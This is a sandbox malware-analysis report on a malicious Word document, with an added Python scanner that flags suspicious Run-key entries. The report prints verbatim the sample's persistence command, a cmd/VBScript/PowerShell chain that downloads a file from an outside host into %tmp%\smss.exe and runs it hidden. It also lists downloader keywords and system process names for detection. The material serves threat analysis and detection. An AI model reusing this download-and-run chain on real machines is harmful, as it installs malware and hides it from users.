Analysis
max time kernel: 465s
max time network: 443s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/03/2025, 10:14
Behavioral task: behavioral1
Sample: 504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc
Resource: win10v2004-20250314-en
General
Target: 504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc
Size: 179KB
MD5: e267aa39a15e33909dae39ec74828f8b
SHA1: ed519641868e38c0531358622bc10b863979e301
SHA256: 504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392
SHA512: 95d9712e8f760e589761337376b329c28e9b5ee2d6ededd77e9dae29dc5dab41927f382562848bd3e2dfeb72859ec6d373335cc51d6c91bf60c1a10da735bb8e
SSDEEP: 3072:Ean7O40C8HRLzZI5Cb1WdqfzdVWnTqUJxDZaQnRBvbmV8tbB:Ean7t0tRHK5C+qfzdVoqwB8Qqk
Malware Config
Signatures
Adds Run key to start application (2 TTPs, 1 IoC)
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS_Office = "cmd /c echo WScript.CreateObject(\"WScript.Shell\").run \"cmd /c powershell iwr -outf %tmp%\\smss.exe https://shoru.net/db/main_db & start %tmp%\\smss.exe\",0,false>\"C:\\Users\\Public\\Libraries\\lib.vbs\"&wscript \"C:\\Users\\Public\\Libraries\\lib.vbs\""
process: WINWORD.EXE
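The Run key value recorded above packs a four-stage persistence chain into one registry string. At the next user logon cmd.exe echoes a one-line VBScript into C:\Users\Public\Libraries\lib.vbs and hands it to wscript.exe; the script calls WScript.Shell.Run with window style 0, so the cmd.exe it spawns is hidden; that cmd.exe runs PowerShell's Invoke-WebRequest (iwr) to fetch https://shoru.net/db/main_db into %tmp%\smss.exe and then starts it. The dropped file borrows the name of the Windows Session Manager, which never lives in a temp directory. The Python below is an added example, not part of the sandbox report or of the sample, that parses a Run value of this shape into its stages and indicators and flags it; the benign comparison value, the list of system process names and the downloader keywords are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Run-key value the sandbox recorded for this sample, in registry form (the report
# shows the inner quotes backslash-escaped; the registry holds them literally).
SAMPLE_RUN_VALUE = (
    r'cmd /c echo WScript.CreateObject("WScript.Shell").run "cmd /c powershell iwr '
    r'-outf %tmp%\smss.exe https://shoru.net/db/main_db & start %tmp%\smss.exe",0,false'
    r'>"C:\Users\Public\Libraries\lib.vbs"&wscript "C:\Users\Public\Libraries\lib.vbs"'
)

# Constructed benign Run value for comparison; not taken from the report.
BENIGN_RUN_VALUE = r'"C:\Program Files\Example Vendor\Updater.exe" /background'

# Assumed list of core Windows process names that dropped payloads commonly borrow.
SYSTEM_PROCESS_NAMES = {"smss.exe", "csrss.exe", "lsass.exe", "svchost.exe", "winlogon.exe"}
# Interpreters and living-off-the-land binaries worth counting in a persistence chain.
INTERPRETERS = ("cmd", "wscript", "cscript", "powershell", "pwsh", "mshta", "rundll32", "regsvr32")
# Assumed keywords that indicate a network fetch inside the command.
DOWNLOADERS = ("iwr", "invoke-webrequest", "curl", "wget", "bitsadmin", "downloadfile")


@dataclass
class RunKeyFinding:
    name: str
    interpreters: list = field(default_factory=list)     # in order of first appearance
    urls: list = field(default_factory=list)
    dropped_files: list = field(default_factory=list)    # written by a download cmdlet
    scripts_written: list = field(default_factory=list)  # written via shell redirection
    launched: list = field(default_factory=list)         # targets of `start`
    hidden_window: bool = False
    masquerading: list = field(default_factory=list)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_run_value(name: str, value: str) -> RunKeyFinding:
    f = RunKeyFinding(name=name)
    low = value.lower()

    # 1. Interpreter chain: which script hosts / LOLBins appear, ordered by position.
    seen = {}
    for host in INTERPRETERS:
        m = re.search(r"(?<![\w\\.])" + host + r"(?:\.exe)?\b", low)
        if m:
            seen[host] = m.start()
    f.interpreters = sorted(seen, key=seen.get)

    # 2. Network fetch and where the download is written (-OutFile / -outf).
    f.urls = re.findall(r'https?://[^\s"\'&<>]+', value)
    f.dropped_files = re.findall(r'-outf(?:ile)?\s+"?([^\s"&]+)', value, re.I)

    # 3. Script written to disk through cmd redirection, and anything passed to `start`.
    f.scripts_written = [a or b for a, b in re.findall(r'>\s*"([^"]+)"|>\s*([^\s"&]+)', value)]
    f.launched = re.findall(r'\bstart\s+(?:"[^"]*"\s+)?"?([^\s"&]+)', value, re.I)

    # 4. WScript.Shell.Run with window style 0 hides the child console.
    f.hidden_window = bool(re.search(r'\.run\s*\(?\s*"[^"]*"\s*,\s*0\s*,', low))

    # 5. Payload names that mimic core system processes outside System32.
    for p in f.dropped_files + f.launched:
        base = _basename(p)
        if base in SYSTEM_PROCESS_NAMES and "system32" not in p.lower() and base not in f.masquerading:
            f.masquerading.append(base)

    # Each independent indicator becomes a reason; any reason makes the entry suspicious.
    if len(f.interpreters) >= 2:
        f.reasons.append("interpreter chain: " + " -> ".join(f.interpreters))
    if f.urls and any(d in low for d in DOWNLOADERS):
        f.reasons.append("downloads from " + ", ".join(f.urls))
    for s in f.scripts_written:
        if low.count(s.lower()) >= 2:  # path written, then referenced again as an argument
            f.reasons.append("writes and runs script " + s)
    if f.hidden_window:
        f.reasons.append("runs payload with a hidden window (WScript.Shell.Run, style 0)")
    for m in f.masquerading:
        f.reasons.append("dropped file borrows system process name " + m)
    return f


def scan_run_values(values: dict) -> list:
    """Return findings for every Run entry that trips at least one indicator."""
    return [r for r in (analyze_run_value(n, v) for n, v in values.items()) if r.suspicious]


if __name__ == "__main__":
    for r in scan_run_values({"MS_Office": SAMPLE_RUN_VALUE, "Updater": BENIGN_RUN_VALUE}):
        print(r.name)
        for reason in r.reasons:
            print("  -", reason)
```

Feed it the name/value pairs from HKCU\Software\Microsoft\Windows\CurrentVersion\Run (for example from a registry export or an EDR query) and it reports the MS_Office entry with five independent reasons while leaving the plain updater entry alone; the URL and the two file paths it extracts are the blockable and huntable indicators from this report.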
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. In this run the queries are attributed to WINWORD.EXE itself rather than to a spawned child, and Office reads these keys during normal startup, so on their own they are weak evidence; the Run key value above is the substantive finding.
description: Key opened
ioc: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
process: WINWORD.EXE
-
description: Key value queried
ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
process: WINWORD.EXE
-
description: Key value queried
ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
process: WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
description: Key value queried
ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
process: WINWORD.EXE
-
description: Key opened
ioc: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
process: WINWORD.EXE
-
description: Key value queried
ioc: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
process: WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
pid: 5640, process: WINWORD.EXE (2 events)
Suspicious use of SetWindowsHookEx (8 IoCs)
pid: 5640, process: WINWORD.EXE (8 events)
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\504368519288583f7d6b6981c641b4b9509bdee7aac1e0d6c2371fc952451392.doc" /o ""
PID: 5640
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
WINWORD.EXE is the only process in the tree: no cmd.exe, wscript.exe or powershell.exe child was recorded during the run, so the command stored in the Run key was written but not observed executing in this analysis.
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 245KB
MD5: f883b260a8d67082ea895c14bf56dd56
SHA1: 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256: ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512: d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize: 2B (this MD5 is that of a bare CRLF, i.e. an empty line rather than a payload)
MD5: f3b25701fe362ec84616a93a45ce9998
SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize: 1KB
MD5: ec1d93dc8461b88d40e865982e3852c9
SHA1: 0fdef2717d204b7813a3232564efbe571cbf8672
SHA256: 423d5c9c293f9501b79eec2a17000c1d0647d3acc20a26d004a464c887da9452
SHA512: dbc8ab830a94a8f821fd3ea546f51871f03200fa8b0a54efc70760f7344f027b9e049b72c7a651330fdd131e6a29b5fca3bb90c36eb7d1866a206111b3b68f2f